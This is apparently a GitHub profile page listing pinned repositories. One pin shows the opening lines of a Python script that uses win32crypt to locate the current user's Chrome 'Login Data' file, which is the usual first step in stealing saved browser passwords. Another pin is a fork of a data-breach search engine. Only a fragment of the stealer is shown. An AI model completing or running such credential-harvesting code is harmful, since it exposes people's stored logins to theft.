ethixkr - Overview
Pinned Loading
-
1
# os and sqlite3 ships with Python by default. If you get import errors for win32crypt use "pip install pypiwin32" to install the dependency.2
import os, sqlite3, win32crypt
4
# Automatically get the logged in user's default folder5
data = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
-
Forked from vinitshahdeo/Hashtagify
📸 Generates hashtags for Instagram posts. Upload your photo and it will suggest the relevant #hashtags for you. 🏷️
JavaScript
-
Forked from ofarukcaki/dataleaks
Leakedsource like "Data Breach Search Engine" with cool Material UI
PHP